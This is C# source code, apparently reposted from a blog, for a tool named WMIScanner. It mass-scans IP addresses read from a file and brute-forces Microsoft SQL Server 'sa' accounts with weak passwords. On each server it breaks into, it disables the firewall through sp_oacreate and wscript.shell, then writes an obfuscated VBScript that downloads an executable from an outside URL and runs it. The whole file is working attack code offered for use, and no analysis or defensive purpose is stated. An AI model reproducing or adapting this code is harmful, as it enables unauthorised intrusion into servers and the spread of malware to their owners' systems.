namespace WMIScanner
{
using System;
using System.Collections;
using System.Data.SqlClient;
using System.IO;
using System.Threading;
using System.Windows.Forms;
public class ScnClass
{
private string cmdLine = "";
private int inNum = 0;
private ArrayList ips = new ArrayList();
private ArrayList rips = new ArrayList();
private Thread[] threads = new Thread[300];
private void CheckRemoteComputer()
{
int num = 5;
int num2 = 5;
string[] strArray = new string[num];
string[] strArray2 = new string[num2];
strArray[0] = "sa";
strArray[1] = "sa";
strArray[2] = "sa";
strArray[3] = "sa";
strArray[4] = "sa";
strArray2[0] = "";
strArray2[1] = "sa";
strArray2[2] = "123";
strArray2[3] = "123456";
strArray2[4] = "password";
int num3 = 0;
int num4 = 0;
int num5 = 0;
while ((num3 == 0) && (num4 < 2))
{
if (num5 == num2)
{
num5 = 0;
num4++;
}
try
{
string str = this.ips.get_Item(int.Parse(Thread.get_CurrentThread().get_Name().ToString())).ToString();
for (int j = 0; j < 5; j++)
{
SqlConnection connection = new SqlConnection("server=" + str + ";uid=" + strArray[j] + ";pwd=" + strArray2[j] + ";database=Master");
SqlCommand command = new SqlCommand(this.cmdLine, connection);
try
{
WMIScanner.ScnClass class2;
connection.Open();
Console.Write(str + " SQL Password is null,Scanned IP like these:" + ((this.rips.get_Count() + 1)).ToString() + ",Sending Command Now...\r\n");
try
{
command.ExecuteNonQuery();
lock ((class2 = this))
{
this.inNum++;
Console.Write("***" + str + "Sending Command Completed,Completed number:" + this.inNum.ToString() + " \r\n");
}
}
catch (Exception exception)
{
Console.Write(str + "Sending Command failed:" + exception.get_Message().ToString() + "\r\n");
}
lock ((class2 = this))
{
this.rips.Add(str);
}
}
catch (Exception exception2)
{
Console.Write(str + " Failure to connect:" + exception2.get_Message().ToString() + "\r\n");
num5++;
}
num3 = 1;
}
continue;
}
catch
{
continue;
}
}
for (int i = 0; i < this.threads.Length; i++)
{
if ((this.threads != null) && (this.threads.get_Name().ToLower() == Thread.get_CurrentThread().get_Name().ToLower()))
{
this.threads = null;
break;
}
}
Thread.get_CurrentThread().Abort();
}
private int CheckTempThreadIndex()
{
for (int i = 0; i < this.threads.Length; i++)
{
if (this.threads == null)
{
return i;
}
}
return -1;
}
private void ReadIPS()
{
StreamReader reader = File.OpenText(Application.get_StartupPath() + @"\ips.txt");
while (reader.Peek() != -1)
{
this.ips.Add(reader.ReadLine());
}
reader.Close();
}
private void ScannIPS()
{
int num = 0;
int num2 = 0;
while (num2 < this.ips.get_Count())
{
try
{
int index = this.CheckTempThreadIndex();
if (index >= 0)
{
this.threads[index] = new Thread(new ThreadStart(this, this.CheckRemoteComputer));
this.threads[index].set_IsBackground(true);
this.threads[index].set_Name(num2.ToString());
this.threads[index].Start();
num2++;
num = 0;
}
else
{
num += 100;
Thread.Sleep(300);
}
continue;
}
catch
{
num = 0;
continue;
}
}
num = 0;
bool flag = false;
while (!flag)
{
Thread.Sleep(0x3e8);
flag = true;
for (int i = 0; i < this.threads.Length; i++)
{
if (this.threads != null)
{
flag = false;
num += 0x3e8;
break;
}
}
if (num >= 0xea60)
{
for (int j = 0; j < this.threads.Length; j++)
{
if (this.threads[j] != null)
{
try
{
this.threads[j].Abort();
}
catch
{
}
this.threads[j] = null;
}
}
num = 0;
return;
}
}
}
public void Task()
{
string str = File.OpenText(Application.get_StartupPath() + @"\url.sys").ReadLine();
Console.Write("Reading Command....\r\n");
this.cmdLine = this.cmdLine + "declare @cmd INT;";
this.cmdLine = this.cmdLine + "exec sp_oacreate 'wscript.shell',@cmd output;";
this.cmdLine = this.cmdLine + "exec sp_oamethod @cmd,'run',null,'cmd /c net1 stop sharedaccess";
this.cmdLine = this.cmdLine + "&echo on error resume next>>run.vbs";
this.cmdLine = this.cmdLine + "&echo set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))>run.vbs";
this.cmdLine = this.cmdLine + "&echo Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))>>run.vbs";
this.cmdLine = this.cmdLine + "&echo xPost.Open Chr(71)+Chr(69)+Chr(84)," + str + ",Chr(48)>>run.vbs";
this.cmdLine = this.cmdLine + "&echo xPost.Send()>>run.vbs";
this.cmdLine = this.cmdLine + "&echo Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))>>run.vbs";
this.cmdLine = this.cmdLine + "&echo sGet.Mode = Chr(51)>>run.vbs";
this.cmdLine = this.cmdLine + "&echo sGet.Type = Chr(49)>>run.vbs";
this.cmdLine = this.cmdLine + "&echo sGet.Open()>>run.vbs";
this.cmdLine = this.cmdLine + "&echo sGet.Write(xPost.responseBody)>>run.vbs";
this.cmdLine = this.cmdLine + "&echo sGet.SaveToFile Chr(50)+Chr(48)+Chr(48)+Chr(56)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)>>run.vbs";
this.cmdLine = this.cmdLine + "&echo oshell.run Chr(50)+Chr(48)+Chr(48)+Chr(56)+Chr(46)+Chr(101)+Chr(120)+Chr(101)>>run.vbs";
this.cmdLine = this.cmdLine + "&cscript run.vbs','0','true'";
Console.Write("Scanning weak passwords...\r\n");
if (File.Exists(Application.get_StartupPath() + @"\ips.txt"))
{
Console.Write("Read IP Addresses...\r\n");
this.ReadIPS();
if (this.ips.get_Count() > 0)
{
Console.Write("Scan Now....\r\n");
this.ScannIPS();
Console.Write("IP Paragraph Scan Finish...\r\n");
}
}
}
}
}
转载于:https://www.cnblogs.com/nibulu/archive/2011/08/04/2127474.html
3207
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
